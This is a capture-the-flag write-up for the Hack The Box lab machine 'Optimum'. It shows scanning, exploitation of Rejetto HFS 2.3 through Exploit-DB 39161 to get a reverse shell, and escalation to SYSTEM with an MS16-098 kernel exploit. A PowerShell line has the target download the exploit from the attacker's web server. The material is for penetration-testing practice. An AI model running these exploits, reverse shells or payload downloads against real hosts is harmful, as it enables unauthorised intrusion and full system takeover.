Optimum
Ports scan
root@kali:~/HTB/Machines# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.8 --rate=1000
Starting masscan 1.0.5 at 2019-11-15 19:55:00 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.10.8
Nmap output
# Nmap 7.80 scan initiated Fri Nov 15 14:56:05 2019 as: nmap -A -T4 -v -oN nmap.txt 10.10.10.8
Nmap scan report for optimum.htb (10.10.10.8)
Host is up (0.046s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-favicon: Unknown favicon MD5: 759792EDD4EF8E6BC2D1877D27153CB1
| http-methods:
|_  Supported Methods: GET HEAD POST
|_http-server-header: HFS 2.3
|_http-title: HFS /
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows 7 Professional (87%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows 7 or Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 or Windows 8.1 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.169 days (since Fri Nov 15 10:52:39 2019)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   44.00 ms 10.10.14.1
2   52.19 ms optimum.htb (10.10.10.8)

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Nov 15 14:56:24 2019 -- 1 IP address (1 host up) scanned in 18.63 seconds
Web portal
Search vulnerability
root@kali:~/HTB/Machines/Optimum# searchsploit Rejetto HTTP File Server
--------------------------------------- ----------------------------------------
 Exploit Title                         |  Path
                                       | (/usr/share/exploitdb/)
--------------------------------------- ----------------------------------------
Rejetto HTTP File Server (HFS) - Remot | exploits/windows/remote/34926.rb
Rejetto HTTP File Server (HFS) 1.5/2.x | exploits/windows/remote/31056.py
Rejetto HTTP File Server (HFS) 2.2/2.3 | exploits/multiple/remote/30850.txt
Rejetto HTTP File Server (HFS) 2.3.x - | exploits/windows/remote/34668.txt
Rejetto HTTP File Server (HFS) 2.3.x - | exploits/windows/remote/39161.py
Rejetto HTTP File Server (HFS) 2.3a/2. | exploits/windows/webapps/34852.txt
--------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
User flag
Exploit-DB 39161 (Rejetto HFS 2.3.x Remote Command Execution, CVE-2014-6287) abuses the handling of a %00 byte in the search parameter: the null byte defeats the filter that strips HFS macro markers from user input, so an {.exec|...} macro placed after it is executed by the server. The script uses this to download nc.exe and open a reverse shell.
root@kali:~/HTB/Machines/Optimum# searchsploit -m 39161.py
  Exploit: Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)
      URL: https://www.exploit-db.com/exploits/39161
     Path: /usr/share/exploitdb/exploits/windows/remote/39161.py
File Type: Python script, ASCII text executable, with very long lines, with CRLF line terminators
In the script, set ip_addr and local_port to the attacker's IP address and the port the listener will use:
ip_addr = "10.10.14.34" #local IP address
local_port = "4444" # Local Port number
Launch listener
root@kali:~/HTB/Machines/Optimum# rlwrap nc -nlvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Launch web server
The exploit makes the target download nc.exe from a web server on the attacker's IP (port 80), so nc.exe must be present in the directory the web server is started from. The header of 39161.py also notes that the exploit may need to be run more than once before the shell comes back.
root@kali:~/HTB/Machines/Optimum# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
Run the exploit
root@kali:~/HTB/Machines/Optimum# python 39161.py 10.10.10.8 80
The listener receives the reverse shell. Each command appears twice because cmd.exe echoes the input it reads from the socket.
root@kali:~/HTB/Machines/Optimum# rlwrap nc -nlvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.8.
Ncat: Connection from 10.10.10.8:49181.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\kostas\Desktop>whoami
whoami
optimum\kostas

C:\Users\kostas\Desktop>type user.txt.txt
type user.txt.txt
<USER FLAG>
Privilege escalation
Find exploit
The banner Microsoft Windows [Version 6.3.9600] identifies Windows 8.1 / Windows Server 2012 R2 (build 9600), consistent with Nmap's OS guess, and that build is the target of the MS16-098 win32k kernel exploit (RGNOBJ integer overflow). Before running any kernel exploit, confirm the patch level (for example with systeminfo), because a kernel exploit against a patched host fails or crashes the machine.
root@kali:~/HTB/Machines/Optimum# searchsploit ms16-098
--------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                             |  Path
                                                                           | (/usr/share/exploitdb/)
--------------------------------------------------------------------------- ----------------------------------------
Microsoft Windows 8.1 (x64) - 'RGNOBJ' Integer Overflow (MS16-098)         | exploits/windows_x86-64/local/41020.c
Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098) (2)       | exploits/windows_x86-64/local/42435.txt
--------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
Copy the source file
root@kali:~/HTB/Machines/Optimum# searchsploit -m 41020
  Exploit: Microsoft Windows 8.1 (x64) - 'RGNOBJ' Integer Overflow (MS16-098)
      URL: https://www.exploit-db.com/exploits/41020
     Path: /usr/share/exploitdb/exploits/windows_x86-64/local/41020.c
File Type: C source, ASCII text, with CRLF line terminators
Copied to: /root/HTB/Machines/Optimum/41020.c
Download the compiled executable
A precompiled binary of 41020 is published in the offensive-security exploitdb-bin-sploits repository. It is downloaded into the directory the Python web server is serving from, so the target can fetch it next. Running a third-party precompiled exploit is a trust decision; the alternative is to compile 41020.c yourself with a mingw-w64 cross compiler.
root@kali:~/HTB/Machines/Optimum# wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe
--2019-11-15 22:17:50--  https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe
Resolving github.com (github.com)... 192.30.253.113
Connecting to github.com (github.com)|192.30.253.113|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/41020.exe [following]
--2019-11-15 22:17:50--  https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/41020.exe
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.204.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.204.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 560128 (547K) [application/octet-stream]
Saving to: ‘41020.exe’
41020.exe 100%[=================================================================================>] 547.00K --.-KB/s in 0.09s
2019-11-15 22:17:50 (5.80 MB/s) - ‘41020.exe’ saved [560128/560128]
Download the exploit onto the target
From the reverse shell, fetch 41020.exe from the attacker's web server (the same Python server on port 80) with PowerShell:
C:\Users\kostas\Desktop>powershell -c "Invoke-WebRequest -Uri http://10.10.14.34/41020.exe -OutFile C:\Users\kostas\Desktop\41020.exe"
powershell -c "Invoke-WebRequest -Uri http://10.10.14.34/41020.exe -OutFile C:\Users\kostas\Desktop\41020.exe"
Run exploit
On success the exploit spawns a new cmd.exe running as SYSTEM inside the existing shell, which is why a second Windows banner appears:
C:\Users\kostas\Desktop>41020
41020
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\kostas\Desktop>whoami
whoami
nt authority\system

C:\Users\kostas\Desktop>cd ..
cd ..

C:\Users\kostas>cd ..
cd ..

C:\Users>cd Administrator
cd Administrator

C:\Users\Administrator>cd Desktop
cd Desktop

C:\Users\Administrator\Desktop>type root.txt
type root.txt
<ROOT FLAG>
Daniel Simao 15:48, 15 November 2019 (EST)